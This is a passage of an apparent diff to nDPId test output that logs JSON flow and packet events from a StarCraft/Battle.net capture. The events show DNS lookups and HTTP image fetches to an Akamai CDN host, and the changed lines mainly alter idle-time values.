00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389985821,"flow_last_seen":1437389985882,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1437389985882,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.228.46.112"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985891,"flow_last_seen":1437389985891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985891,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1437389985891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985891,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN5AAIAG2oXAqAFkAuQucA3HAFCKhzd4AAAAAIACIACLmQAAAgQFtAEDAwgBAQQC"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985892,"flow_last_seen":1437389985892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985892,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1437389985892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985892,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN9AAIAG2oTAqAFkAuQucA3IAFBzB1TrAAAAAIACIACFpQAAAgQFtAEDAwgBAQQC"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985898,"flow_last_seen":1437389985898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985898,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1437389985898,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985898,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOBAAIAG2oPAqAFkAuQucA3JAFBxSWFcAAAAAIACIAB68QAAAgQFtAEDAwgBAQQC"} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985898,"flow_last_seen":1437389985898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985898,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1437389985898,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985898,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOFAAIAG2oLAqAFkAuQucA3KAFB0cH\/ZAAAAAIACIABZTAAAAgQFtAEDAwgBAQQC"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985923,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985923,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOJAAIAG2oHAqAFkAuQucA3LAFDKy4tMAAAAAIACIAD3fAAAAgQFtAEDAwgBAQQC"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDccmQrPVioc3eYASOQiYawAAAgQFtAEBBAIBAwMF"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLONAAIAG2ozAqAFkAuQucA3HAFCKhzd5JkKz1lAQAQARRAAA"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOVAAIAG2n7AqAFkAuQucA3MAFCmW5TdAAAAAIACIAASWwAAAgQFtAEDAwgBAQQC"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOZAAIAG2n3AqAFkAuQucA3NAFAjKxvdAAAAAIACIAAOiwAAAgQFtAEDAwgBAQQC"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1437389985927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985927,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDci+ghTYcwdU7IASOQiZNAAAAgQFtAEBBAIBAwMF"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1437389985927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985927,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOdAAIAG2ojAqAFkAuQucA3IAFBzB1TsvoIU2VAQAQASDQAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1437389985929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985929,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcngMONLcUlhXYASOQieXgAAAgQFtAEBBAIBAwMF"} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1437389985929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985929,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOhAAIAG2ofAqAFkAuQucA3JAFBxSWFd4DDjTFAQAQAXNwAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1437389985930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985930,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcrPCIDOdHB\/2oASOQjwXgAAAgQFtAEBBAIBAwMF"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1437389985930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985930,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOlAAIAG2obAqAFkAuQucA3KAFB0cH\/azwiAz1AQAQBpNwAA"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985955,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcsAWb5HysuLTYASOQgfxgAAAgQFtAEBBAIBAwMF"} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985955,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOxAAIAG2oPAqAFkAuQucA3LAFDKy4tNAFm+SFAQAQCYngAA"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1437389985957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985957,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcy5z5mcpluU3oASOQil2AAAAgQFtAEBBAIBAwMF"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1437389985957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985957,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLO9AAIAG2oDAqAFkAuQucA3MAFCmW5Teuc+ZnVAQAQAesQAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985960,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985960,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LPVAAIAG2m7AqAFkAuQucA3OAFAbejKQAAAAAIACIAD\/hwAAAgQFtAEDAwgBAQQC"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985962,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDc1+R6dFIysb3oASOQjP5wAAAgQFtAEBBAIBAwMF"} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985962,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLPpAAIAG2nXAqAFkAuQucA3NAFAjKxvefkenRlAQAQBIwAAA"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985891,"flow_last_seen":1437389985891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985891,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1437389985891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985891,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN5AAIAG2oXAqAFkAuQucA3HAFCKhzd4AAAAAIACIACLmQAAAgQFtAEDAwgBAQQC"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985892,"flow_last_seen":1437389985892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985892,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1437389985892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985892,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN9AAIAG2oTAqAFkAuQucA3IAFBzB1TrAAAAAIACIACFpQAAAgQFtAEDAwgBAQQC"} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985898,"flow_last_seen":1437389985898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985898,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1437389985898,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985898,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOBAAIAG2oPAqAFkAuQucA3JAFBxSWFcAAAAAIACIAB68QAAAgQFtAEDAwgBAQQC"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985898,"flow_last_seen":1437389985898,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985898,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
